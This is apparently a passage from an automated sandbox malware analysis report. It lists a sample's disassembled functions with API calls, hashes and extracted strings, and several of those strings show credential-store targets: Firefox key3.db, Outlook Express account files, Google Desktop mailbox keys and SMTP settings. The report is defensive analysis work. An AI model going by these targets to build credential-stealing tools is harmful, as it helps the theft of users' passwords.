                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: @ $SQLite format 3
                                                            • API String ID: 231171946-3708268960
                                                            • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                            • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                            • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                            • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                            Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: winWrite1$winWrite2
                                                            • API String ID: 438689982-3457389245
                                                            • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                            • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                            • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                            • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                            Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: winRead
                                                            • API String ID: 1297977491-2759563040
                                                            • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                            • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                            • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                            • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                            Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0044955B
                                                            • memset.MSVCRT ref: 0044956B
                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: gj
                                                            • API String ID: 1297977491-4203073231
                                                            • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                            • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                            • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                            • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                            Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            • memset.MSVCRT ref: 0040AB9C
                                                              • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                              • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                              • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                            • sprintf.MSVCRT ref: 0040ABE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                            • API String ID: 3337535707-2769808009
                                                            • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                            • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                            • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                            • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                            Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 004090C2
                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ClientParentPoints
                                                            • String ID:
                                                            • API String ID: 4247780290-0
                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                            Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                              • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                              • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                            • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                              • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                              • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                              • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                              • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                            • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                            • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                            • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                            • String ID:
                                                            • API String ID: 2374668499-0
                                                            • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                            • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                            • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                            • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                            Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040AD5B
                                                            • memset.MSVCRT ref: 0040AD71
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                              • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                              • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                            • sprintf.MSVCRT ref: 0040ADA8
                                                            Strings
                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                            • <%s>, xrefs: 0040ADA2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                            • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                            • API String ID: 3699762281-1998499579
                                                            • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                            • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                            • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                            • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                            Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A3E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A4C
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A5D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A74
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A7D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                            • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                            • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                            • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                            Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A3E
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A4C
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A5D
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A74
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A7D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                            • free.MSVCRT ref: 00409B00
                                                              • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@$free
                                                            • String ID:
                                                            • API String ID: 2241099983-0
                                                            • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                            • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                            • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                            • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                            Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                              • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                              • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                            • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                            • GetSysColor.USER32(00000005), ref: 004107A6
                                                            • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                            • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                            • String ID:
                                                            • API String ID: 2775283111-0
                                                            • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                            • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                            • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                            • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                            Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                              • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                              • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                              • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                            • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                            • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                            • String ID: $
                                                            • API String ID: 2498372239-3993045852
                                                            • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                            • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                            • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                            • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                            Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                            • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                              • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                              • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                            • String ID: Ul@$key3.db
                                                            • API String ID: 1968906679-1563549157
                                                            • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                            • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                            • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                            • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                            Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi$_mbscpy
                                                            • String ID: smtp
                                                            • API String ID: 2625860049-60245459
                                                            • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                            • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                            Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00408258
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                            Strings
                                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Close$EnumOpenmemset
                                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                                            • API String ID: 2255314230-2212045309
                                                            • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                            • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                            Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C28C
                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FocusMessagePostmemset
                                                            • String ID: S_@$l
                                                            • API String ID: 3436799508-4018740455
                                                            • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                            • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                            Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy
                                                            • String ID: C^@$X$ini
                                                            • API String ID: 714388716-917056472
                                                            • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                            • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                            • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                            • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                            Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
